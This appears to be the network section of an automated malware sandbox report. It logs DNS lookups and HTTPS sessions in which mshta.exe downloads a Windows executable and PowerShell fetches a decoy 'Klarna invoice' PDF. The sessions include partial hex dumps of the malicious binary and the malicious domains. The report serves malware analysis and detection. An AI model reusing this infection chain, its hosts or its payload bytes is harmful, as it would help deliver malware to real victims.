                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.973048925 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.974308014 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.974879980 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.974919081 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.975138903 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.975178003 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.976130962 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.976180077 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977463007 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977507114 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977674961 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977715969 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977895021 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977929115 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977938890 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977955103 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.978123903 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.978154898 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.978182077 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.978403091 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:14.019429922 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.661894083 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.662031889 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.662231922 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.662508011 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.662548065 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.730932951 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.731056929 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.731154919 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.731508970 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.731544971 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.946357012 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.946470976 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.947648048 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.947666883 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.947994947 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.949604034 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.949642897 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.949695110 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.811660051 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.811795950 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.811882019 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.812175035 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.812220097 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.812248945 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.812263966 CET44349871104.21.16.1192.168.2.5
Timestamp                            | Source Port | Dest Port | Source IP   | Dest IP
Dec 21, 2024 14:59:00.548774958 CET  | 49935       | 53        | 192.168.2.5 | 1.1.1.1
Dec 21, 2024 14:59:01.380871058 CET  | 53          | 49935     | 1.1.1.1     | 192.168.2.5
Dec 21, 2024 14:59:20.521310091 CET  | 58855       | 53        | 192.168.2.5 | 1.1.1.1
Dec 21, 2024 14:59:36.226567984 CET  | 61775       | 53        | 192.168.2.5 | 1.1.1.1
Dec 21, 2024 14:59:50.163650036 CET  | 53307       | 53        | 192.168.2.5 | 1.1.1.1
Dec 21, 2024 14:59:52.458853960 CET  | 55295       | 53        | 192.168.2.5 | 1.1.1.1
Dec 21, 2024 14:59:52.788829088 CET  | 53          | 55295     | 1.1.1.1     | 192.168.2.5
Timestamp                            | Source IP   | Dest IP | Trans ID | OP Code            | Name                  | Type           | Class       | DNS over HTTPS
Dec 21, 2024 14:59:00.548774958 CET  | 192.168.2.5 | 1.1.1.1 | 0x7a28   | Standard query (0) | dimitricostruzioni.ch | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:20.521310091 CET  | 192.168.2.5 | 1.1.1.1 | 0xb18d   | Standard query (0) | x1.i.lencr.org        | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:36.226567984 CET  | 192.168.2.5 | 1.1.1.1 | 0x1eec   | Standard query (0) | x1.i.lencr.org        | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:50.163650036 CET  | 192.168.2.5 | 1.1.1.1 | 0x3e4a   | Standard query (0) | x1.i.lencr.org        | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:52.458853960 CET  | 192.168.2.5 | 1.1.1.1 | 0xc7c9   | Standard query (0) | securesways.click     | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 21, 2024 14:59:01.380871058 CET | 1.1.1.1 | 192.168.2.5 | 0x7a28 | No error (0) | dimitricostruzioni.ch | | 62.182.21.105 | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:16.995680094 CET | 1.1.1.1 | 192.168.2.5 | 0xb901 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:16.995680094 CET | 1.1.1.1 | 192.168.2.5 | 0xb901 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:20.660690069 CET | 1.1.1.1 | 192.168.2.5 | 0xb18d | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 21, 2024 14:59:36.366405964 CET | 1.1.1.1 | 192.168.2.5 | 0x1eec | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 21, 2024 14:59:50.391271114 CET | 1.1.1.1 | 192.168.2.5 | 0x3e4a | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 21, 2024 14:59:52.788829088 CET | 1.1.1.1 | 192.168.2.5 | 0xc7c9 | No error (0) | securesways.click | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:52.788829088 CET | 1.1.1.1 | 192.168.2.5 | 0xc7c9 | No error (0) | securesways.click | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:52.788829088 CET | 1.1.1.1 | 192.168.2.5 | 0xc7c9 | No error (0) | securesways.click | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:52.788829088 CET | 1.1.1.1 | 192.168.2.5 | 0xc7c9 | No error (0) | securesways.click | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:52.788829088 CET | 1.1.1.1 | 192.168.2.5 | 0xc7c9 | No error (0) | securesways.click | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:52.788829088 CET | 1.1.1.1 | 192.168.2.5 | 0xc7c9 | No error (0) | securesways.click | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Dec 21, 2024 14:59:52.788829088 CET | 1.1.1.1 | 192.168.2.5 | 0xc7c9 | No error (0) | securesways.click | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
• dimitricostruzioni.ch
• securesways.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 62.182.21.105 | 443 | 5832 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-21 13:59:03 UTC | 340 | OUT | GET /documentcomplie HTTP/1.1
  Accept: */*
  Accept-Language: en-CH
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: dimitricostruzioni.ch
  Connection: Keep-Alive
2024-12-21 13:59:03 UTC | 364 | IN | HTTP/1.1 200 OK
  Connection: close
  last-modified: Fri, 20 Dec 2024 17:42:35 GMT
  accept-ranges: bytes
  content-length: 473509
  date: Sat, 21 Dec 2024 13:59:03 GMT
  server: LiteSpeed
  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                              2024-12-21 13:59:03 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a0 52 e6 d8 e4 33 88 8b e4 33 88 8b e4 33 88 8b 00 43 8b 8a e7 33 88 8b 00 43 8c 8a fc 33 88 8b 00 43 8d 8a e3 33 88 8b 00 43 89 8a f9 33 88 8b e4 33 89 8b cd 32 88 8b 00 43 80 8a f0 33 88 8b 00 43 77 8b e5 33 88 8b 00 43 8a 8a e5 33 88 8b 52 69 63 68 e4 33 88 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 fd b9 f0 9e 00 00 00
                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$R333C3C3C3C332C3Cw3C3Rich3PEL
                                                                                                                                                                                                                                              2024-12-21 13:59:03 UTC16384INData Raw: cc cc cc 8b ff 55 8b ec 51 8b 45 08 53 56 8b f1 57 89 86 a4 00 00 00 8b 45 0c 89 86 a8 00 00 00 ff 15 94 21 41 00 ff 75 18 8b 86 a4 00 00 00 33 db 53 53 53 ff 70 04 8b ce ff 15 a4 21 41 00 8b f8 85 ff 0f 88 ce 00 00 00 6a 01 8b ce ff 15 94 20 41 00 8b f8 85 ff 0f 88 ba 00 00 00 6a 01 8b ce ff 15 98 20 41 00 8b f8 85 ff 0f 88 a6 00 00 00 8b 8e a4 00 00 00 56 ff 15 48 21 41 00 6a 01 8b ce ff 15 24 21 41 00 8d 45 fc 50 ff 15 bc 20 41 00 8b f8 85 ff 78 7f ff 75 fc 8b ce ff 15 9c 20 41 00 8b f8 85 ff 79 0b 8b 4d fc ff 15 c0 20 41 00 eb 63 6a 10 bf 05 40 00 80 e8 c3 9c 00 00 8b d0 59 85 d2 74 14 8b 8e a4 00 00 00 8b 49 04 89 5a 04 89 5a 08 89 4a 0c eb 02 8b d3 89 96 ac 00 00 00 85 d2 74 30 53 8d 45 fc 8b ca 50 0f b7 45 10 53 56 68 90 16 40 00 50 ff b6 a8 00 00
                                                                                                                                                                                                                                              Data Ascii: UQESVWE!Au3SSSp!Aj Aj AVH!Aj$!AEP Axu AyM Acj@YtIZZJt0SEPESVh@P
                                                                                                                                                                                                                                              2024-12-21 13:59:03 UTC16384INData Raw: 10 6a 2d 59 e8 3e de ff ff ff b5 dc fd ff ff ff 15 6c 22 41 00 83 f8 ff 74 37 6a 0e 68 e8 21 40 00 8b cb e8 72 04 00 00 ff b5 dc fd ff ff ff 15 68 22 41 00 a1 38 10 41 00 3b c7 74 14 f6 40 1c 10 74 0e ff 70 14 ff 70 10 6a 2e 59 e8 f6 dd ff ff 8b 8d dc fd ff ff 33 ff 8d 49 f0 e8 6a b4 ff ff 8b 8d d8 fd ff ff 8d 49 f0 e8 5c b4 ff ff 8b 8d d4 fd ff ff 8d 49 f0 e8 4e b4 ff ff 83 bd c4 fd ff ff 00 74 0c ff b5 c4 fd ff ff ff 15 64 20 41 00 8d 4e f0 e8 31 b4 ff ff 8d 8d ac fd ff ff e8 b7 05 00 00 8b c7 e8 06 6b 00 00 c2 0c 00 cc cc cc cc cc cc 6a 00 b8 ac fd 40 00 e8 1b 6b 00 00 8b 45 08 85 c0 74 38 8b 00 ba 08 22 40 00 66 8b 30 33 c9 41 66 3b 32 75 1e 66 85 f6 74 15 66 8b 70 02 66 3b 72 02 75 0f 83 c0 04 83 c2 04 66 85 f6 75 db 33 c0 eb 04 1b c0 0b c1 85 c0 74
                                                                                                                                                                                                                                              Data Ascii: j-Y>l"At7jh!@rh"A8A;t@tppj.Y3IjI\INtd AN1kj@kEt8"@f03Af;2uftfpf;rufu3t
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: dd 85 c0 fe ff ff dc 4d b0 de c1 d9 18 d9 85 1c ff ff ff d9 58 04 d9 85 18 ff ff ff d9 58 08 d9 85 14 ff ff ff d9 58 0c d9 85 10 ff ff ff d9 58 10 d9 85 0c ff ff ff d9 58 14 d9 85 08 ff ff ff d9 58 18 d9 85 e0 fe ff ff d9 58 1c d9 85 04 ff ff ff d9 58 20 d9 85 00 ff ff ff d9 58 24 d9 85 fc fe ff ff d9 58 28 d9 85 f8 fe ff ff d9 58 2c d9 85 f4 fe ff ff d9 58 30 d9 85 f0 fe ff ff d9 58 34 d9 85 ec fe ff ff d9 58 38 d9 85 e4 fe ff ff d9 58 3c d9 85 e8 fe ff ff d9 58 40 d9 85 d0 fe ff ff d9 58 44 d9 85 d4 fe ff ff d9 58 48 d9 85 d8 fe ff ff d9 58 4c d9 85 dc fe ff ff d9 58 50 d9 45 f4 d9 58 54 d9 45 ec d9 58 58 d9 45 e4 d9 58 5c d9 45 fc d9 58 60 c9 c2 04 00 cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 60 d9 42 04 d8 05 44 16 41 00 8b 45 08 d9 5d fc d9 42 08 d8 05
                                                                                                                                                                                                                                              Data Ascii: MXXXXXXXX X$X(X,X0X4X8X<X@XDXHXLXPEXTEXXEX\EX`U`BDAE]B
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 40 1c 41 00 40 16 40 00 48 16 40 00 38 10 41 00 00 00 00 00 84 28 40 00 32 00 00 00 33 00 00 00 02 00 00 00 18 00 00 00 00 00 00 00 9c 28 40 00 42 00 00 00 43 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 b8 28 40 00 36 00 00 00 37 00 00 00 02 00 00 00 1c 00 00 00 00 00 00 00 cc 28 40 00 40 00 00 00 41 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 e4 28 40 00 3a 00 00 00 3b 00 00 00 02 00 00 00 08 00 00 00 00 00 00 00 fc 28 40 00 34 00 00 00 35 00 00 00 02 00 00 00 08 00 00 00 00 00 00 00 14 29 40 00 10 20 00 00 11 20 00 00 01 00 00 00 00 00 00 00 00 00 00 00 38 29 40 00 0e 20 00 00 0f 20 00 00 01 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: @A@@H@8A(@23(@BC(@67(@@A0(@:;(@45)@ 8)@
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: 4d 00 55 00 49 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 10 00 00 00 65 00 6e 00 2d 00 55 00 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: MUIen-US
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: 68 ff ff ff e8 dd 02 00 00 8b 45 1c 8b 8d dc fe ff ff 89 85 3c ff ff ff 8d 85 2c ff ff ff 50 89 9d 40 ff ff ff 89 b5 44 ff ff ff 89 9d 48 ff ff ff e8 b0 02 00 00 8b 45 14 89 85 1c ff ff ff 89 9d 20 ff ff ff 89 b5 24 ff ff ff 89 9d 28 ff ff ff 8b 45 10 89 9d 10 ff ff ff c7 85 14 ff ff ff 08 00 00 00 89 9d 18 ff ff ff 8b 00 89 85 0c ff ff ff 8d 85 ec fe ff ff 50 6a 11 53 53 ff b5 d8 fe ff ff ff b5 d4 fe ff ff e8 a3 fd ff ff 8b 4d fc 5f 5e 33 cd 5b e8 65 b0 00 00 c9 c2 44 00 cc cc cc cc cc cc 8b ff 55 8b ec 81 ec 60 01 00 00 a1 04 13 41 00 33 c5 89 45 fc 8b 45 18 89 85 a8 fe ff ff 8b 45 20 89 85 ac fe ff ff 8b 45 28 53 8b 5d 3c 89 85 b0 fe ff ff 8b 45 30 56 8b 75 48 89 85 b4 fe ff ff 8b 45 38 57 8b 7d 44 89 85 b8 fe ff ff 8d 45 ec 89 8d a0 fe ff ff 8b 4d 54
                                                                                                                                                                                                                                              Data Ascii: hE<,P@DHE $(EPjSSM_^3[eDU`A3EEE E(S]<E0VuHE8W}DEMT
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: f0 e8 b1 cc ff ff 8d 57 48 c6 45 fc 01 8d 4d f0 e8 50 02 00 00 8b ce ba 20 14 41 00 f7 d9 1b c9 81 c1 02 00 00 80 85 f6 75 05 ba a0 13 41 00 8b 75 f0 56 68 58 13 41 00 e8 4f fe ff ff 8d 4e f0 c6 45 fc 00 e8 82 c4 ff ff 8b 75 e8 85 f6 74 42 68 78 12 41 00 8d 4d f0 e8 5a cc ff ff c6 45 fc 02 84 db 74 03 83 c7 18 8b d7 8d 4d f0 e8 f3 01 00 00 8b 75 f0 ba 20 14 41 00 56 68 84 13 41 00 b9 01 00 00 80 e8 02 fe ff ff 8d 4e f0 e8 39 c4 ff ff 8b 75 ec 8d 4d e0 e8 f0 24 00 00 8b c6 e8 f4 7a 00 00 c3 cc cc cc cc cc cc 6a 1c b8 eb fb 40 00 e8 25 7b 00 00 8b f9 33 db 8d 4d e4 53 68 90 1f 40 00 89 5d ec e8 79 24 00 00 89 5d fc 89 5d d8 89 5d dc 89 5d e0 8d 4d f0 c6 45 fc 01 e8 53 67 00 00 68 06 00 02 00 8d 4d d8 ff 30 68 02 00 00 80 e8 53 e8 ff ff 8b 4d f0 8b f0 83 c1
                                                                                                                                                                                                                                              Data Ascii: WHEMP AuAuVhXAONEutBhxAMZEtMu AVhAN9uM$zj@%{3MSh@]y$]]]]MESghM0hSM
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: 3b d0 74 10 66 89 3a 03 d7 3b d0 75 f7 8b 56 10 85 d2 74 60 85 db 8b fa 8b 5d 08 74 2c 0f b7 46 14 6b c8 2c 03 ca 3b d1 74 1f 8b 7e 0c 83 c2 08 39 7a fc 76 07 8b 02 3b 43 08 74 38 83 c2 2c 8d 42 f8 3b c1 75 ea 8b 7e 10 0f b7 46 16 33 d2 0f b7 4e 14 40 f7 f1 0f b7 c2 33 d2 6b c8 2c 42 66 89 46 16 8b 46 08 03 cf f0 0f c1 10 42 52 53 e8 b4 fd ff ff 5f 5e 5b 5d c2 04 00 cc cc cc cc cc cc 8b ff 55 8b ec 51 53 56 8b 35 ec 1c 41 00 33 db 57 8b fb 85 f6 74 51 39 5e 04 75 1c 8b 0e 8d 55 fc 89 5d fc e8 87 15 00 00 85 c0 78 0b 39 5e 04 75 06 8b 45 fc 89 46 04 8b 76 04 8d 46 10 f7 de 1b f6 23 f0 74 22 ff 15 e0 22 41 00 6a 0a 59 33 d2 8b f8 f7 f1 8b 4c 96 08 eb 07 39 39 74 10 8b 49 04 85 c9 75 f5 8b fb 8b c7 5f 5e 5b c9 c3 83 c1 08 8b f9 74 f2 39 59 08 75 ed 8d 46 04
                                                                                                                                                                                                                                              Data Ascii: ;tf:;uVt`]t,Fk,;t~9zv;Ct8,B;u~F3N@3k,BfFFBRS_^[]UQSV5A3WtQ9^uU]x9^uEFvF#t""AjY3L99tIu_^[t9YuF
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: 04 41 00 e9 46 fb ff ff cc cc cc cc cc cc 8d 4d f0 e9 15 4c ff ff 8d 4d ec e9 0d 4c ff ff 8d 4d d4 e9 6d 69 ff ff 8d 4d e0 e9 fd 4b ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a cc 33 c8 e8 ba f0 ff ff b8 ac 04 41 00 e9 fe fa ff ff cc cc cc cc cc cc 8d 8d d4 fd ff ff e9 2c a5 ff ff 8d 8d e8 fd ff ff e9 2c 85 ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 8a d0 fd ff ff 33 c8 e8 79 f0 ff ff 8b 4a fc 33 c8 e8 6f f0 ff ff b8 f0 04 41 00 e9 b3 fa ff ff cc cc cc cc cc cc 8d 4d f0 e9 ef 84 ff ff 8d 4d ec e9 e7 84 ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 8a 7c ff ff ff 33 c8 e8 34 f0 ff ff b8 24 05 41 00 e9 78 fa ff ff cc cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 11 f0 ff ff b8 74 02 41 00 e9 55 fa ff ff cc cc cc cc cc cc
                                                                                                                                                                                                                                              Data Ascii: AFMLMLMmiMKT$BJ3A,,T$B3yJ3oAMMT$B|34$AxT$BJ3tAU


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 62.182.21.105 | 443 | 3396 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-21 13:59:08 UTC | 113 | OUT | GET /new/files/Documents/KlarnaInvoice42611.pdf HTTP/1.1
  Host: dimitricostruzioni.ch
  Connection: Keep-Alive
2024-12-21 13:59:08 UTC | 217 | IN | HTTP/1.1 200 OK
  Connection: close
  content-type: application/pdf
  last-modified: Thu, 19 Dec 2024 00:54:53 GMT
  accept-ranges: bytes
  content-length: 114905
  date: Sat, 21 Dec 2024 13:59:08 GMT
  server: LiteSpeed
                                                                                                                                                                                                                                              2024-12-21 13:59:08 UTC1151INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 31 38 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 31 34 36 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 31 34 37 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 31 35 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e
                                                                                                                                                                                                                                              Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 18 0 R/MarkInfo<</Marked true>>/Metadata 146 0 R/ViewerPreferences 147 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 15 0 R] >>endobj3 0 obj<</Type/Page/Paren
                                                                                                                                                                                                                                              2024-12-21 13:59:08 UTC14994INData Raw: e9 6a 1d f6 c0 4c d1 ec 69 60 aa 06 f6 90 d1 46 8e 3d 8d 4b f0 f2 ec 69 b3 f5 14 4c 05 3c d9 dd e0 f1 75 b3 60 a8 14 18 aa 49 dc 95 0c 95 5d c8 50 f9 a6 64 39 1f 47 43 75 0c 12 f8 08 86 aa 67 8d e4 8c 8f 0f 63 04 48 aa 73 9a 36 25 1c f0 16 5d 7c f1 65 9c b6 6a 2b 07 a9 34 aa 72 99 35 fe ea 97 e3 78 5c 6c cb 38 5a 70 ca a8 11 7e b6 a0 22 68 16 70 f6 08 c2 9a 31 f6 ac f8 dc 9c a4 89 a5 b9 e9 96 9a 9b d5 56 e7 04 3d 3a 54 2a 39 0c 97 1f 77 6e c4 bb 38 61 e1 1f fa 10 eb 78 0f d1 79 36 14 8d 0b 4c df 22 0e 9a ea 6a a7 7b 66 f7 0c df 70 02 4a 49 2a cb 14 be 4b ca e2 17 52 16 57 95 b4 77 54 59 4e e0 8f 85 cd 7c a3 40 4b ca c4 c9 6b 49 19 47 ef 94 01 6d 95 da a9 45 6b ba 3a 1d 92 37 5d 65 7a e4 4d d7 24 f9 96 b4 b1 96 ce 65 68 70 f6 21 c8 6d 98 f3 23 cc 4f 63 44
                                                                                                                                                                                                                                              Data Ascii: jLi`F=KiL<u`I]Pd9GCugcHs6%]|ej+4r5x\l8Zp~"hp1V=:T*9wn8axy6L"j{fpJI*KRWwTYN|@KkIGmEk:7]ezM$ehp!m#OcD
                                                                                                                                                                                                                                              2024-12-21 13:59:08 UTC16384INData Raw: 26 bc 71 f6 5c 55 f1 28 5d 71 fa f2 38 76 ec 78 f1 28 bd 0c 27 4e 7c 2b 7b 2f dd b7 ef bc 35 69 52 f6 5e fa fa 07 d2 d3 d8 b0 71 e3 c8 fd af b3 f7 52 51 59 99 3d 9a 36 6d fa 82 85 0b 87 86 86 b3 f7 92 5e 32 83 b9 a3 74 2f 33 67 7e 9c 7d 8c e9 5e de ff e0 83 ec d1 a6 4d 9b 27 4d 9a 94 be ba b2 f7 92 1e 63 f6 28 bd 5e d2 95 7d db bd b4 e4 ef 65 fc f8 f1 75 17 33 f7 92 fe 30 3d fc b3 e7 32 af 97 a6 e6 e6 89 6f bd 75 34 77 2f e9 a5 94 9e 70 f6 5e da 3b 3a 27 4f 99 92 bd 97 3b 77 7b de 7b ef fd f5 b9 d7 4b 7a 44 53 a7 4e ad a8 5c 95 fe 69 ca de cb a2 45 8b 06 87 32 ff b6 a4 7b 99 3f 7f 7e ff c0 40 f1 48 32 4c 01 00 10 da a3 31 4c 2d 5e bc 64 f5 9a 35 c5 a3 f4 d3 df ca 95 15 cb 97 af c8 be e1 c6 8d 1b 17 2c 58 98 3d da be e3 f3 39 73 e7 66 8f f6 ee fb a2 a4 b4
